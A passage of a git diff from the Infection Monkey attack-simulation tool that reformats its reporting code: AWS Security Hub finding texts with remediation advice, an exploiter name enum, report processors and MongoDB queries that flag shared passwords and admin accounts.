issue['username']), + "SMB protocol with user {2}.".format( + issue["machine"], issue["ip_address"], issue["username"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -192,12 +193,12 @@ class AWSExporter(Exporter): severity=1, title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.", description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " - "network.".format(issue['username']), + "network.".format(issue["username"]), recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. 
The Monkey authenticated over the SSH" - " protocol with user {2} and its " - "password.".format(issue['machine'], issue['ip_address'], issue['username']), + " protocol with user {2} and its " + "password.".format(issue["machine"], issue["ip_address"], issue["username"]), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -206,14 +207,15 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.", - description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']), + description="Protect {ssh_key} private key with a pass phrase.".format( + ssh_key=issue["ssh_key"] + ), recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated " - "over the SSH protocol with private key {ssh_key}.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - ssh_key=issue['ssh_key']), + "over the SSH protocol with private key {ssh_key}.".format( + machine=issue["machine"], ip_address=issue["ip_address"], ssh_key=issue["ssh_key"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -224,11 +226,11 @@ class AWSExporter(Exporter): title="Elastic Search servers are vulnerable to CVE-2015-1427", description="Update your Elastic Search server to version 1.4.3 and up.", recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made " - "possible because the Elastic Search server was not patched against CVE-2015-1427.".format( - issue['machine'], - issue['ip_address']), + "possible because the Elastic Search server was not patched against CVE-2015-1427.".format( + issue["machine"], issue["ip_address"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -238,14 +240,14 @@ class AWSExporter(Exporter): severity=1, title="Weak segmentation - Machines from different segments are able to communicate.", description="Segment your network and make sure there is no communication between machines from different " - "segments.", + "segments.", recommendation="The network can probably be segmented. 
A monkey instance on \ {0} in the networks {1} \ - could directly access the Monkey Island server in the networks {2}.".format(issue['machine'], - issue['networks'], - issue['server_networks']), + could directly access the Monkey Island server in the networks {2}.".format( + issue["machine"], issue["networks"], issue["server_networks"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -255,9 +257,11 @@ class AWSExporter(Exporter): severity=1, title="Multiple users have the same password", description="Some users are sharing passwords, this should be fixed by changing passwords.", - recommendation="These users are sharing access password: {0}.".format(issue['shared_with']), + recommendation="These users are sharing access password: {0}.".format( + issue["shared_with"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -268,11 +272,12 @@ class AWSExporter(Exporter): title="Machines are vulnerable to 'Shellshock'", description="Update your Bash to a ShellShock-patched version.", recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. " - "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a " - "shell injection attack on the paths: {3}.".format( - issue['machine'], issue['ip_address'], issue['port'], issue['paths']), + "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a " + "shell injection attack on the paths: {3}.".format( + issue["machine"], issue["ip_address"], issue["port"], issue["paths"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -282,14 +287,13 @@ class AWSExporter(Exporter): severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " - "network.".format(issue['username']), + "network.".format(issue["username"]), recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB " - "protocol with user {2} and its password.".format( - issue['machine'], - issue['ip_address'], - issue['username']), + "protocol with user {2} and its password.".format( + issue["machine"], issue["ip_address"], issue["username"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -299,14 +303,13 @@ class AWSExporter(Exporter): severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " - "network.", + "network.", recommendation="The machine {machine} ({ip_address}) is vulnerable to a WMI attack. 
The Monkey authenticated over " - "the WMI protocol with user {username} and its password.".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + "the WMI protocol with user {username} and its password.".format( + machine=issue["machine"], ip_address=issue["ip_address"], username=issue["username"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -316,14 +319,13 @@ class AWSExporter(Exporter): severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " - "network.".format(issue['username']), + "network.".format(issue["username"]), recommendation="The machine {machine} ({ip_address}) is vulnerable to a WMI attack. The Monkey used a " - "pass-the-hash attack over WMI protocol with user {username}".format( - machine=issue['machine'], - ip_address=issue['ip_address'], - username=issue['username']), + "pass-the-hash attack over WMI protocol with user {username}".format( + machine=issue["machine"], ip_address=issue["ip_address"], username=issue["username"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -334,9 +336,10 @@ class AWSExporter(Exporter): title="Multiple users have the same password.", description="Some domain users are sharing passwords, this should be fixed by changing passwords.", recommendation="These users are sharing access password: {shared_with}.".format( - shared_with=issue['shared_with']), + shared_with=issue["shared_with"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -345,12 +348,14 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Shared local administrator account - Different machines have the same account as a local administrator.", - description="Make sure the right administrator accounts are managing the right machines, and that there isn\'t " - "an unintentional local admin sharing.", + description="Make sure the right administrator accounts are managing the right machines, and that there isn't " + "an unintentional local admin sharing.", recommendation="Here is a list of machines which the account {username} is defined as an administrator: " - "{shared_machines}".format(username=issue['username'], shared_machines=issue['shared_machines']), + "{shared_machines}".format( + username=issue["username"], shared_machines=issue["shared_machines"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -361,10 +366,11 @@ class AWSExporter(Exporter): title="Mimikatz found login credentials of a user who has admin access to a server defined as critical.", description="This critical machine is open to attacks via strong users with access to it.", recommendation="The services: {services} have been found on the machine thus classifying it as a critical " - "machine. 
These users has access to it:{threatening_users}.".format( - services=issue['services'], threatening_users=issue['threatening_users']), + "machine. These users has access to it:{threatening_users}.".format( + services=issue["services"], threatening_users=issue["threatening_users"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -375,10 +381,12 @@ class AWSExporter(Exporter): title="Struts2 servers are vulnerable to remote code execution.", description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.", recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to remote code execution attack." - "The attack was made possible because the server is using an old version of Jakarta based file " - "upload Multipart parser.".format(machine=issue['machine'], ip_address=issue['ip_address']), + "The attack was made possible because the server is using an old version of Jakarta based file " + "upload Multipart parser.".format( + machine=issue["machine"], ip_address=issue["ip_address"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -388,12 +396,14 @@ class AWSExporter(Exporter): severity=10, title="Oracle WebLogic servers are vulnerable to remote code execution.", description="Install Oracle critical patch updates. Or update to the latest version. " - "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", + "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to remote code execution attack." - "The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware " - "(subcomponent: WLS Security).".format(machine=issue['machine'], ip_address=issue['ip_address']), + "The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware " + "(subcomponent: WLS Security).".format( + machine=issue["machine"], ip_address=issue["ip_address"] + ), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -404,7 +414,7 @@ class AWSExporter(Exporter): title="Hadoop/Yarn servers are vulnerable to remote code execution.", description="Run Hadoop in secure mode, add Kerberos authentication.", recommendation="The Hadoop server at {machine} ({ip_address}) is vulnerable to remote code execution attack." 
- "The attack was made possible due to default Hadoop/Yarn configuration being insecure.", + "The attack was made possible due to default Hadoop/Yarn configuration being insecure.", instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) diff --git a/monkey/monkey_island/cc/services/reporting/exporter_init.py b/monkey/monkey_island/cc/services/reporting/exporter_init.py index 391b23cf1..c19f3d5e3 100644 --- a/monkey/monkey_island/cc/services/reporting/exporter_init.py +++ b/monkey/monkey_island/cc/services/reporting/exporter_init.py @@ -13,7 +13,10 @@ def populate_exporter_list(): if len(manager.get_exporters_list()) != 0: logger.debug( - "Populated exporters list with the following exporters: {0}".format(str(manager.get_exporters_list()))) + "Populated exporters list with the following exporters: {0}".format( + str(manager.get_exporters_list()) + ) + ) def try_add_aws_exporter_to_manager(manager): diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py index 65964b5de..f519100ed 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py @@ -2,13 +2,18 @@ from dataclasses import dataclass from enum import Enum from typing import Type, Dict -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.cred_exploit import \ - CredExploitProcessor -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ExploitProcessor -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.shellshock_exploit import \ - ShellShockExploitProcessor -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.zerologon import \ - ZerologonExploitProcessor +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.cred_exploit import ( + CredExploitProcessor, +) +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ( + ExploitProcessor, +) +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.shellshock_exploit import ( + ShellShockExploitProcessor, +) +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.zerologon import ( + ZerologonExploitProcessor, +) @dataclass @@ -20,23 +25,35 @@ class ExploiterDescriptor: class ExploiterDescriptorEnum(Enum): - SMB = ExploiterDescriptor('SmbExploiter', 'SMB Exploiter', CredExploitProcessor) - WMI = ExploiterDescriptor('WmiExploiter', 'WMI Exploiter', CredExploitProcessor) - SSH = ExploiterDescriptor('SSHExploiter', 'SSH Exploiter', CredExploitProcessor) - SAMBACRY = ExploiterDescriptor('SambaCryExploiter', 'SambaCry Exploiter', CredExploitProcessor) - ELASTIC = ExploiterDescriptor('ElasticGroovyExploiter', 'Elastic Groovy Exploiter', ExploitProcessor) - MS08_067 = ExploiterDescriptor('Ms08_067_Exploiter', 'Conficker Exploiter', ExploitProcessor) - SHELLSHOCK = ExploiterDescriptor('ShellShockExploiter', 'ShellShock Exploiter', ShellShockExploitProcessor) - STRUTS2 = ExploiterDescriptor('Struts2Exploiter', 'Struts2 
Exploiter', ExploitProcessor) - WEBLOGIC = ExploiterDescriptor('WebLogicExploiter', 'Oracle WebLogic Exploiter', ExploitProcessor) - HADOOP = ExploiterDescriptor('HadoopExploiter', 'Hadoop/Yarn Exploiter', ExploitProcessor) - MSSQL = ExploiterDescriptor('MSSQLExploiter', 'MSSQL Exploiter', ExploitProcessor) - VSFTPD = ExploiterDescriptor('VSFTPDExploiter', 'VSFTPD Backdoor Exploiter', CredExploitProcessor) - DRUPAL = ExploiterDescriptor('DrupalExploiter', 'Drupal Server Exploiter', ExploitProcessor) - ZEROLOGON = ExploiterDescriptor('ZerologonExploiter', 'Zerologon Exploiter', ZerologonExploitProcessor) + SMB = ExploiterDescriptor("SmbExploiter", "SMB Exploiter", CredExploitProcessor) + WMI = ExploiterDescriptor("WmiExploiter", "WMI Exploiter", CredExploitProcessor) + SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor) + SAMBACRY = ExploiterDescriptor("SambaCryExploiter", "SambaCry Exploiter", CredExploitProcessor) + ELASTIC = ExploiterDescriptor( + "ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor + ) + MS08_067 = ExploiterDescriptor("Ms08_067_Exploiter", "Conficker Exploiter", ExploitProcessor) + SHELLSHOCK = ExploiterDescriptor( + "ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor + ) + STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor) + WEBLOGIC = ExploiterDescriptor( + "WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor + ) + HADOOP = ExploiterDescriptor("HadoopExploiter", "Hadoop/Yarn Exploiter", ExploitProcessor) + MSSQL = ExploiterDescriptor("MSSQLExploiter", "MSSQL Exploiter", ExploitProcessor) + VSFTPD = ExploiterDescriptor( + "VSFTPDExploiter", "VSFTPD Backdoor Exploiter", CredExploitProcessor + ) + DRUPAL = ExploiterDescriptor("DrupalExploiter", "Drupal Server Exploiter", ExploitProcessor) + ZEROLOGON = ExploiterDescriptor( + "ZerologonExploiter", "Zerologon Exploiter", ZerologonExploitProcessor + ) @staticmethod def get_by_class_name(class_name: str) -> ExploiterDescriptor: - return [descriptor.value - for descriptor in ExploiterDescriptorEnum - if descriptor.value.class_name == class_name][0] + return [ + descriptor.value + for descriptor in ExploiterDescriptorEnum + if descriptor.value.class_name == class_name + ][0] diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py index 3e1cb0601..c7a4bd1d0 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py @@ -4,9 +4,9 @@ from typing import Union, List class CredentialType(Enum): - PASSWORD = 'password' - HASH = 'hash' - KEY = 'key' + PASSWORD = "password" + HASH = "hash" + KEY = "key" @dataclass diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/cred_exploit.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/cred_exploit.py index 43156561c..7ccce8e00 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/cred_exploit.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/cred_exploit.py @@ -1,23 +1,26 @@ -from 
monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_report_info import \ - ExploiterReportInfo, CredentialType -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ExploitProcessor +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_report_info import ( + ExploiterReportInfo, + CredentialType, +) +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ( + ExploitProcessor, +) class CredExploitProcessor: - @staticmethod def get_exploit_info_by_dict(class_name: str, exploit_dict: dict) -> ExploiterReportInfo: exploit_info = ExploitProcessor.get_exploit_info_by_dict(class_name, exploit_dict) - for attempt in exploit_dict['data']['attempts']: - if attempt['result']: - exploit_info.username = attempt['user'] - if attempt['password']: + for attempt in exploit_dict["data"]["attempts"]: + if attempt["result"]: + exploit_info.username = attempt["user"] + if attempt["password"]: exploit_info.credential_type = CredentialType.PASSWORD.value - exploit_info.password = attempt['password'] - elif attempt['ssh_key']: + exploit_info.password = attempt["password"] + elif attempt["ssh_key"]: exploit_info.credential_type = CredentialType.KEY.value - exploit_info.ssh_key = attempt['ssh_key'] + exploit_info.ssh_key = attempt["ssh_key"] else: exploit_info.credential_type = CredentialType.HASH.value return exploit_info diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/exploit.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/exploit.py index c541ba252..1b29fc773 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/exploit.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/exploit.py @@ -1,12 +1,12 @@ from monkey_island.cc.services.node import NodeService -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_report_info import \ - ExploiterReportInfo +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_report_info import ( + ExploiterReportInfo, +) class ExploitProcessor: - @staticmethod def get_exploit_info_by_dict(class_name: str, exploit_dict: dict) -> ExploiterReportInfo: - ip_addr = exploit_dict['data']['machine']['ip_addr'] + ip_addr = exploit_dict["data"]["machine"]["ip_addr"] machine = NodeService.get_node_hostname(NodeService.get_node_or_monkey_by_ip(ip_addr)) return ExploiterReportInfo(ip_address=ip_addr, machine=machine, type=class_name) diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py index d33bd8615..cd627eb5c 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py @@ -1,14 +1,15 @@ -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import \ - ExploiterReportInfo, ExploitProcessor +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ( + ExploiterReportInfo, + ExploitProcessor, +) class ShellShockExploitProcessor: - 
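The cred_exploit hunk above only re-wraps the existing logic, but the flow is easy to lose in a diff: for each successful attempt, the presence of a password, then an ssh_key, and otherwise a hash decides the credential type. A simplified sketch of that decision, using invented attempt dicts rather than real Monkey telemetry:

    # Sketch: classify a successful exploit attempt the way CredExploitProcessor does.
    # The attempt dicts here are invented examples, not real telemetry.
    def credential_type(attempt):
        if attempt["password"]:
            return "password"
        if attempt["ssh_key"]:
            return "key"
        return "hash"

    attempts = [
        {"result": False, "user": "root", "password": "", "ssh_key": ""},
        {"result": True, "user": "admin", "password": "", "ssh_key": "-----BEGIN KEY-----"},
    ]

    for attempt in attempts:
        if attempt["result"]:
            print(attempt["user"], "->", credential_type(attempt))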
@staticmethod def get_exploit_info_by_dict(class_name: str, exploit_dict: dict) -> ExploiterReportInfo: exploit_info = ExploitProcessor.get_exploit_info_by_dict(class_name, exploit_dict) - urls = exploit_dict['data']['info']['vulnerable_urls'] - exploit_info.port = urls[0].split(':')[2].split('/')[0] - exploit_info.paths = ['/' + url.split(':')[2].split('/')[1] for url in urls] + urls = exploit_dict["data"]["info"]["vulnerable_urls"] + exploit_info.port = urls[0].split(":")[2].split("/")[0] + exploit_info.paths = ["/" + url.split(":")[2].split("/")[1] for url in urls] return exploit_info diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/zerologon.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/zerologon.py index e0be6cd42..09bbce0d6 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/zerologon.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/zerologon.py @@ -1,11 +1,12 @@ -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ExploitProcessor, \ - ExploiterReportInfo +from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ( + ExploitProcessor, + ExploiterReportInfo, +) class ZerologonExploitProcessor: - @staticmethod def get_exploit_info_by_dict(class_name: str, exploit_dict: dict) -> ExploiterReportInfo: exploit_info = ExploitProcessor.get_exploit_info_by_dict(class_name, exploit_dict) - exploit_info.password_restored = exploit_dict['data']['info']['password_restored'] + exploit_info.password_restored = exploit_dict["data"]["info"]["password_restored"] return exploit_info diff --git a/monkey/monkey_island/cc/services/reporting/pth_report.py b/monkey/monkey_island/cc/services/reporting/pth_report.py index 2389b12da..99c5a7467 100644 --- a/monkey/monkey_island/cc/services/reporting/pth_report.py +++ b/monkey/monkey_island/cc/services/reporting/pth_report.py @@ -7,7 +7,7 @@ from monkey_island.cc.models import Monkey from monkey_island.cc.services.groups_and_users_consts import USERTYPE from monkey_island.cc.services.node import NodeService -__author__ = 'maor.rayzin' +__author__ = "maor.rayzin" class PTHReportService(object): @@ -31,19 +31,22 @@ class PTHReportService(object): """ pipeline = [ - {"$match": { - 'NTLM_secret': { - "$exists": "true", "$ne": None} - }}, + {"$match": {"NTLM_secret": {"$exists": "true", "$ne": None}}}, { "$group": { - "_id": { - "NTLM_secret": "$NTLM_secret"}, + "_id": {"NTLM_secret": "$NTLM_secret"}, "count": {"$sum": 1}, - "Docs": {"$push": {'_id': "$_id", 'name': '$name', 'domain_name': '$domain_name', - 'machine_id': '$machine_id'}} - }}, - {'$match': {'count': {'$gt': 1}}} + "Docs": { + "$push": { + "_id": "$_id", + "name": "$name", + "domain_name": "$domain_name", + "machine_id": "$machine_id", + } + }, + } + }, + {"$match": {"count": {"$gt": 1}}}, ] return mongo.db.groupsandusers.aggregate(pipeline) @@ -56,8 +59,8 @@ class PTHReportService(object): :return: A list of formatted machines names *domain*/*hostname*, to use in shared admins issues. 
""" - machines = mongo.db.monkey.find({'_id': {'$in': admin_on_machines}}, {'hostname': 1}) - return [domain_name + '\\' + i['hostname'] for i in list(machines)] + machines = mongo.db.monkey.find({"_id": {"$in": admin_on_machines}}, {"hostname": 1}) + return [domain_name + "\\" + i["hostname"] for i in list(machines)] @staticmethod def __strong_users_on_crit_query(): @@ -69,33 +72,28 @@ class PTHReportService(object): A list of said users """ pipeline = [ + {"$unwind": "$admin_on_machines"}, + {"$match": {"type": USERTYPE, "domain_name": {"$ne": None}}}, { - '$unwind': '$admin_on_machines' + "$lookup": { + "from": "monkey", + "localField": "admin_on_machines", + "foreignField": "_id", + "as": "critical_machine", + } }, - { - '$match': {'type': USERTYPE, 'domain_name': {'$ne': None}} - }, - { - '$lookup': - { - 'from': 'monkey', - 'localField': 'admin_on_machines', - 'foreignField': '_id', - 'as': 'critical_machine' - } - }, - { - '$match': {'critical_machine.critical_services': {'$ne': []}} - }, - { - '$unwind': '$critical_machine' - } + {"$match": {"critical_machine.critical_services": {"$ne": []}}}, + {"$unwind": "$critical_machine"}, ] return mongo.db.groupsandusers.aggregate(pipeline) @staticmethod def __build_dup_user_label(i): - return i['hostname'] + '\\' + i['username'] if i['hostname'] else i['domain_name'] + '\\' + i['username'] + return ( + i["hostname"] + "\\" + i["username"] + if i["hostname"] + else i["domain_name"] + "\\" + i["username"] + ) @staticmethod def get_duplicated_passwords_nodes(): @@ -104,13 +102,15 @@ class PTHReportService(object): for doc in docs: users_list = [ { - 'username': user['name'], - 'domain_name': user['domain_name'], - 'hostname': NodeService.get_hostname_by_id(ObjectId(user['machine_id'])) if - user['machine_id'] else None - } for user in doc['Docs'] + "username": user["name"], + "domain_name": user["domain_name"], + "hostname": NodeService.get_hostname_by_id(ObjectId(user["machine_id"])) + if user["machine_id"] + else None, + } + for user in doc["Docs"] ] - users_cred_groups.append({'cred_groups': users_list}) + users_cred_groups.append({"cred_groups": users_list}) return users_cred_groups @@ -119,13 +119,19 @@ class PTHReportService(object): user_groups = PTHReportService.get_duplicated_passwords_nodes() issues = [] for group in user_groups: - user_info = group['cred_groups'][0] + user_info = group["cred_groups"][0] issues.append( { - 'type': 'shared_passwords_domain' if user_info['domain_name'] else 'shared_passwords', - 'machine': user_info['hostname'] if user_info['hostname'] else user_info['domain_name'], - 'shared_with': [PTHReportService.__build_dup_user_label(i) for i in group['cred_groups']], - 'is_local': False if user_info['domain_name'] else True + "type": "shared_passwords_domain" + if user_info["domain_name"] + else "shared_passwords", + "machine": user_info["hostname"] + if user_info["hostname"] + else user_info["domain_name"], + "shared_with": [ + PTHReportService.__build_dup_user_label(i) for i in group["cred_groups"] + ], + "is_local": False if user_info["domain_name"] else True, } ) return issues @@ -137,16 +143,23 @@ class PTHReportService(object): # object has at least two objects in it, by making sure any value exists in the array index 1. # Excluding the name Administrator - its spamming the lists and not a surprise the domain Administrator account # is shared. 
- admins = mongo.db.groupsandusers.find({'type': USERTYPE, 'name': {'$ne': 'Administrator'}, - 'admin_on_machines.1': {'$exists': True}}, - {'admin_on_machines': 1, 'name': 1, 'domain_name': 1}) + admins = mongo.db.groupsandusers.find( + { + "type": USERTYPE, + "name": {"$ne": "Administrator"}, + "admin_on_machines.1": {"$exists": True}, + }, + {"admin_on_machines": 1, "name": 1, "domain_name": 1}, + ) return [ { - 'name': admin['name'], - 'domain_name': admin['domain_name'], - 'admin_on_machines': PTHReportService.__get_admin_on_machines_format(admin['admin_on_machines'], - admin['domain_name']) - } for admin in admins + "name": admin["name"], + "domain_name": admin["domain_name"], + "admin_on_machines": PTHReportService.__get_admin_on_machines_format( + admin["admin_on_machines"], admin["domain_name"] + ), + } + for admin in admins ] @staticmethod @@ -154,13 +167,14 @@ class PTHReportService(object): admins_info = PTHReportService.get_shared_admins_nodes() return [ { - 'is_local': False, - 'type': 'shared_admins_domain', - 'machine': admin['domain_name'], - 'username': admin['domain_name'] + '\\' + admin['name'], - 'shared_machines': admin['admin_on_machines'], + "is_local": False, + "type": "shared_admins_domain", + "machine": admin["domain_name"], + "username": admin["domain_name"] + "\\" + admin["name"], + "shared_machines": admin["admin_on_machines"], } - for admin in admins_info] + for admin in admins_info + ] @staticmethod def get_strong_users_on_critical_machines_nodes(): @@ -169,15 +183,18 @@ class PTHReportService(object): docs = PTHReportService.__strong_users_on_crit_query() for doc in docs: - hostname = str(doc['critical_machine']['hostname']) + hostname = str(doc["critical_machine"]["hostname"]) if hostname not in crit_machines: crit_machines[hostname] = { - 'threatening_users': [], - 'critical_services': doc['critical_machine']['critical_services'] + "threatening_users": [], + "critical_services": doc["critical_machine"]["critical_services"], } - crit_machines[hostname]['threatening_users'].append( - {'name': str(doc['domain_name']) + '\\' + str(doc['name']), - 'creds_location': doc['secret_location']}) + crit_machines[hostname]["threatening_users"].append( + { + "name": str(doc["domain_name"]) + "\\" + str(doc["name"]), + "creds_location": doc["secret_location"], + } + ) return crit_machines @staticmethod @@ -186,11 +203,14 @@ class PTHReportService(object): return [ { - 'type': 'strong_users_on_crit', - 'machine': machine, - 'services': crit_machines[machine].get('critical_services'), - 'threatening_users': [i['name'] for i in crit_machines[machine]['threatening_users']] - } for machine in crit_machines + "type": "strong_users_on_crit", + "machine": machine, + "services": crit_machines[machine].get("critical_services"), + "threatening_users": [ + i["name"] for i in crit_machines[machine]["threatening_users"] + ], + } + for machine in crit_machines ] @staticmethod @@ -198,22 +218,20 @@ class PTHReportService(object): user_details = {} crit_machines = PTHReportService.get_strong_users_on_critical_machines_nodes() for machine in crit_machines: - for user in crit_machines[machine]['threatening_users']: - username = user['name'] + for user in crit_machines[machine]["threatening_users"]: + username = user["name"] if username not in user_details: - user_details[username] = { - 'machines': [], - 'services': [] - } - user_details[username]['machines'].append(machine) - user_details[username]['services'] += crit_machines[machine]['critical_services'] + user_details[username] = 
